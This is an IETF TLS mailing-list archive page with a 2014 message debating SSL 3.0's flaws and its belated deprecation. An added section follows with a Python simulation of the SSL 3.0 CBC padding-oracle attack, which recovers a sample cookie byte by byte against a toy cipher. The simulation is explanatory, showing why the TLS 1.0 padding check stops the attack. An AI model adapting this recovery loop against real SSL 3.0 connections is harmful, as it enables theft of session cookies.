Re: [TLS] Prohibiting SSL 3.0
Watson Ladd <watsonbladd@gmail.com> Fri, 31 October 2014 14:15 UTC
In-Reply-To: <CADMpkc+sBA8X4XodX2S_S4jTkpixzJfQ82UKUQyF-_fHG5Vqrg@mail.gmail.com>
References: <BLU177-W4981235CC3AA2325B8CC01C39F0@phx.gbl> <20141031010310.2F9631AF6E@ld9781.wdf.sap.corp> <CACsn0cn0CFxt-tnnkTr8OF41uLxx8SGTNM8yK90SUiJDPgcN_Q@mail.gmail.com> <CADMpkc+sBA8X4XodX2S_S4jTkpixzJfQ82UKUQyF-_fHG5Vqrg@mail.gmail.com>
Date: Fri, 31 Oct 2014 07:15:04 -0700
Message-ID: <CACsn0c=3RFSRAbw5tvgK+WwPwXFc6n59nr+yWdfxWJbc9m0CVQ@mail.gmail.com>
From: Watson Ladd <watsonbladd@gmail.com>
To: Bodo Moeller <bmoeller@acm.org>
Archived-At: http://mailarchive.ietf.org/arch/msg/tls/VZho_pDdXNHxTvkyME19Qba2ZEw
Cc: "tls@ietf.org" <tls@ietf.org>
Subject: Re: [TLS] Prohibiting SSL 3.0
List-Id: "This is the mailing list for the Transport Layer Security working group of the IETF." <tls.ietf.org>
List-Archive: <http://www.ietf.org/mail-archive/web/tls/>
On Oct 31, 2014 6:18 AM, "Bodo Moeller" <bmoeller@acm.org> wrote:
>
> Watson Ladd <watsonbladd@gmail.com>:
>
>> No, the root of all evil is hiring a biology student for a summer to
>> make a security protocol. It's a miracle SSLv3 works at all, showing
>> that the Lord protects drunks, fools, and interns.
>
> I don't think that's fair to Paul Kocher; see also
> https://www.usenix.org/legacy/publications/library/proceedings/ec96/full_papers/wagner/wagner.pdf
> for a protocol analysis done by people that I think don't have a biology
> background. (Was Paul an intern or a paid consultant at that time? I
> thought the latter [cf. http://www.informatik.uni-trier.de/~ley/pers/hd/k/Kocher:Paul_C=].
> He'd been a consultant to RSA Data Security before, although the only
> thing I seem to remember about his work at that time was that he found
> not much wrong with RC4.)

Paul Kocher did invent side channel analysis a few years later.

Contrast the TLS response to protocol flaws to that of IPsec: The first
round of IPsec was terrible. So a second version was developed, which was
much better and is widely used today. By contrast, the improved version of
SSL v3 wasn't, and each successive version never fully addressed the
security issues.

> It seems pretty safe to say that Phil Rogaway would have been able to
> spot additional problems and improve the SSL 3.0 protocol, but this was
> years before there was a systematic understanding of many of the relevant
> concepts. Chosen-ciphertext attacks were a thing, but "authenticated
> encryption" was unheard of. This was even before
> http://web.cs.ucdavis.edu/~rogaway/papers/sym-enc.pdf

You're understating the degree of knowledge at the time, and overstating
the extent to which open questions needed to be answered to see that SSL
v3 was flawed. Again, read what Rogaway said about IPsec, and ask "did
this apply to SSL?" No one would have caught the decryption oracle in PKCS
1.5 or renegotiation, or Triple Handshake at the time.

But all the attacks we're discussing rely on record layer choices that
were known at the time they were made to have secure alternatives. Was the
Rogaway IPsec comment document not written in the 1994-1995 period?

The question is not why SSL v3 got it wrong. The question is why we didn't
get it right a few years later, and stop using broken protocols. You wrote
in 2004 that one byte could be extracted from an SSL v3 ciphertext, thus
breaking confidentiality completely. Yet it's not until 2014 that this
actually leads to action on deprecating SSL v3.

Sincerely,
Watson Ladd

> Bodo
>
> _______________________________________________
> TLS mailing list
> TLS@ietf.org
> https://www.ietf.org/mailman/listinfo/tls
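The record-layer choice behind the "one byte from an SSL v3 ciphertext" remark is that SSL 3.0 checks only the padding-length byte of a CBC record and never the padding bytes themselves, so an attacker who can replay a chosen ciphertext block into the final (all-padding) block position learns one plaintext byte every 256 attempts on average. The simulation below is added here as an illustration and is not code from the thread or from any TLS implementation: a toy Feistel cipher stands in for 3DES, HMAC-SHA1 stands in for the SSL 3.0 MAC, the RNG is seeded so the run is repeatable, and the "cookie" is a constructed sample. Only the two padding checks (SSL 3.0: length byte only; TLS 1.0 and later: every padding byte must equal the length byte) mirror the real record layers, and the TLS-style check is what stops the recovery loop.

```python
"""Simulation of the SSL 3.0 CBC padding weakness versus a TLS 1.0-style check.

Everything here is a stand-in built for the demonstration: the block cipher is a
toy Feistel network, the MAC is HMAC-SHA1, IVs and padding come from a seeded RNG.
Only the padding rules are faithful to the two record layers.
"""
import hashlib
import hmac
import random

BLOCK = 8      # 64-bit blocks, as with the 3DES-CBC suites of SSL 3.0
MAC_LEN = 20   # SHA-1-sized MAC, as in the *-SHA suites


def _f(key, rnd, half):
    """Round function of the toy cipher (simulation only, not a real cipher)."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]


def _feistel(key, block, rounds):
    l, r = block[:4], block[4:]
    for i in rounds:
        l, r = r, bytes(a ^ b for a, b in zip(l, _f(key, i, r)))
    return r + l          # final swap so decryption is the same network, keys reversed


def encrypt_block(key, block):
    return _feistel(key, block, range(4))


def decrypt_block(key, block):
    return _feistel(key, block, reversed(range(4)))


def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = encrypt_block(key, bytes(a ^ b for a, b in zip(pt[i:i + BLOCK], prev)))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out.append(bytes(a ^ b for a, b in zip(decrypt_block(key, blk), prev)))
        prev = blk
    return b"".join(out)


class Session:
    """Key material shared by client and server; strict_padding=False models SSL 3.0,
    strict_padding=True models the TLS 1.0 rule. Seeded RNG keeps the demo repeatable."""

    def __init__(self, strict_padding, seed=1):
        self.rng = random.Random(seed)
        self.key = self.rand(16)
        self.mac_key = self.rand(16)
        self.strict_padding = strict_padding
        self.requests = 0

    def rand(self, n):
        return bytes(self.rng.getrandbits(8) for _ in range(n))


def client_record(s, data):
    """One record: IV || CBC(data || MAC || padding || padlen), minimal padding."""
    body = data + hmac.new(s.mac_key, data, hashlib.sha1).digest()
    padlen = (BLOCK - (len(body) + 1) % BLOCK) % BLOCK
    pad = bytes([padlen]) * padlen if s.strict_padding else s.rand(padlen)  # SSL 3.0: arbitrary bytes
    iv = s.rand(BLOCK)
    s.requests += 1
    return iv + cbc_encrypt(s.key, iv, body + pad + bytes([padlen]))


def server_accepts(s, record):
    """Decrypt, check padding per the selected rule, then check the MAC."""
    iv, ct = record[:BLOCK], record[BLOCK:]
    pt = cbc_decrypt(s.key, iv, ct)
    padlen = pt[-1]
    if padlen >= BLOCK or padlen + 1 + MAC_LEN > len(pt):   # SSL 3.0 checks only this byte
        return False
    if s.strict_padding and any(b != padlen for b in pt[-(padlen + 1):]):
        return False                                         # TLS 1.0: padding bytes must all equal padlen
    body = pt[:-(padlen + 1)]
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(s.mac_key, data, hashlib.sha1).digest())


def make_victim(s, secret):
    """A client the attacker can drive: it sends attacker-chosen filler around a secret
    (say, a cookie) that the attacker cannot read directly."""
    def request(prefix_len, suffix_len):
        return client_record(s, b"A" * prefix_len + secret + b"B" * suffix_len)
    return request


def recover_byte(s, request, secret_len, j, max_tries=4096):
    """Align secret[j] as the last byte of a block, make the final block pure padding,
    then copy the target block over the final one and watch whether the server accepts."""
    prefix = (-(j + 1)) % BLOCK
    suffix = (-(prefix + secret_len + MAC_LEN)) % BLOCK      # body length multiple of BLOCK
    target = (prefix + j) // BLOCK + 1                       # +1 because index 0 is the IV
    for _ in range(max_tries):
        rec = request(prefix, suffix)
        blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
        last = len(blocks) - 1
        blocks[last] = blocks[target]
        if server_accepts(s, b"".join(blocks)):
            # accepted only if D(C_target)[-1] ^ C_{n-1}[-1] == BLOCK-1, which gives P_target[-1]
            return (BLOCK - 1) ^ blocks[last - 1][-1] ^ blocks[target - 1][-1]
    return None


def recover_secret(s, request, secret_len, max_tries=4096):
    out = bytearray()
    for j in range(secret_len):
        b = recover_byte(s, request, secret_len, j, max_tries)
        if b is None:
            return None
        out.append(b)
    return bytes(out)


if __name__ == "__main__":
    SECRET = b"session=42"   # constructed sample cookie
    for strict in (False, True):
        s = Session(strict_padding=strict)
        got = recover_secret(s, make_victim(s, SECRET), len(SECRET), max_tries=4096)
        print("TLS 1.0-style padding" if strict else "SSL 3.0 padding", got, "requests:", s.requests)
```

With SSL 3.0 rules the loop recovers the whole sample cookie in roughly 256 requests per byte; with the TLS 1.0 rule the substituted block would have to decrypt to eight identical padding bytes, which never happens within the attempt budget, so the same oracle yields nothing.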
- [TLS] Prohibiting SSL 3.0 Yuhong Bao
- Re: [TLS] Prohibiting SSL 3.0 Martin Thomson
- Re: [TLS] Prohibiting SSL 3.0 Florian Weimer
- Re: [TLS] Prohibiting SSL 3.0 Hubert Kario
- Re: [TLS] Prohibiting SSL 3.0 Peter Gutmann
- Re: [TLS] Prohibiting SSL 3.0 Florian Weimer
- Re: [TLS] Prohibiting SSL 3.0 Ilari Liusvaara
- Re: [TLS] Prohibiting SSL 3.0 Manuel Pégourié-Gonnard
- Re: [TLS] Prohibiting SSL 3.0 Bodo Moeller
- Re: [TLS] Prohibiting SSL 3.0 Eric Rescorla
- Re: [TLS] Prohibiting SSL 3.0 Manuel Pégourié-Gonnard
- Re: [TLS] Prohibiting SSL 3.0 Salz, Rich
- Re: [TLS] Prohibiting SSL 3.0 Hubert Kario
- Re: [TLS] Prohibiting SSL 3.0 Yoav Nir
- Re: [TLS] Prohibiting SSL 3.0 Hubert Kario
- Re: [TLS] Prohibiting SSL 3.0 Yoav Nir
- Re: [TLS] Prohibiting SSL 3.0 Hubert Kario
- Re: [TLS] Prohibiting SSL 3.0 Martin Rex
- Re: [TLS] Prohibiting SSL 3.0 Manuel Pégourié-Gonnard
- Re: [TLS] Prohibiting SSL 3.0 Martin Rex
- Re: [TLS] Prohibiting SSL 3.0 Watson Ladd
- Re: [TLS] Prohibiting SSL 3.0 Martin Rex
- Re: [TLS] Prohibiting SSL 3.0 Geoffrey Keating
- Re: [TLS] Prohibiting SSL 3.0 Watson Ladd
- Re: [TLS] Prohibiting SSL 3.0 Bodo Moeller
- Re: [TLS] Prohibiting SSL 3.0 Watson Ladd
- Re: [TLS] Prohibiting SSL 3.0 Bodo Moeller
- Re: [TLS] Prohibiting SSL 3.0 Watson Ladd
- Re: [TLS] Prohibiting SSL 3.0 Sean Turner
- Re: [TLS] Prohibiting SSL 3.0 Joseph Salowey
- Re: [TLS] Prohibiting SSL 3.0 Yuhong Bao
- Re: [TLS] Prohibiting SSL 3.0 Yoav Nir
- Re: [TLS] Prohibiting SSL 3.0 Dave Garrett
- Re: [TLS] Prohibiting SSL 3.0 Jeffrey Walton
- Re: [TLS] Prohibiting SSL 3.0 Yoav Nir